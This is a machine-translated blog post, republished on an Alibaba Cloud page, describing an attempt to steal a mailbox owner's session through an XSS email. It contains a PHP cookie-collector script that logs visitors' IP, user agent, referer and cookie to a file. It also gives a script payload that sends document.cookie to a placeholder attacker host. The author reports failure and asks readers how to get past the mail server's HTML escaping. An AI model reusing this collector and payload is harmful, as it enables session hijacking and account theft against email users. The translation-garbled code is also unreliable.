How to send an email containing a script and obtain the Session of the mailbox owner

Source: Internet
Author: User

For example, I recently studied XSS attacks and suddenly thought of this question: "How can I send an email containing a script and obtain the Session of the mailbox host ?"
?
". If we can do this, it will surely create a security storm on the Internet.


I would like to practice it if I have an idea.
This is the curiosity of computer workers.

 

1. Try the webpage mailbox

* First write a small PHP (Vole. php
) File to accept sent session information and save it in the file

<? Php <br/> $ IP = $ _ server ['remote _ ADDR ']; <br/> $ Referer = $ _ server ['HTTP _ referer']; <br/> $ agent = $ _ server ['HTTP _ user_agent ']; <br/> $ DATA = $ _ Get ["Val"]; <br/> $ time = date ("Y-m-d G: I: S "); <br/> $ text = "<HTML> <body> <br/> <p> ". $ time. "</P> // la date <br/> <p> ". $ IP. "</P> // ip d' utilisateur <br/> <p> User Agent :". $ agent. "</P> // le type de navigateur <br/> <p> Referer :". $ referer. "</P> // URL <br/ > <P> session :". $ data. "</P> // cookie <br/> <p >==================================</P> <br/> </br> </body> </ptml> "; <br/> $ file = fopen('cinfos.html ', 'A'); // enregistrer CES Infos dans un fichier <br/> fwrite ($ file, $ text ); <br/> fclose ($ file); <br/>?>



* After the preparation is complete, send an email containing a script to a mailbox.


The email content is as follows:

<SCRIPT> document. Location = "http://X.X.X.X/vole.php? Val = "+ document. Cookie; </SCRIPT>

/* Four x Host IP addresses */





* Check the email in the browser to see if the script in the email will be loaded by the browser.

The results also failed, and the page source code was found.<
And> are replaced by the email server
& Lt
Et
& Gt


, HTML Escape Character

I tried to find other technologies to avoid replacement, but it was not possible. If some cool people knew the solution, the younger brother immediately begged for a solution.


 

 

 

2. Try the desktop mailbox Software

The result still ends with a failure.

 

 

 

The younger brother posted this article hoping to receive guidance from the oX. Thank you first.

 

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.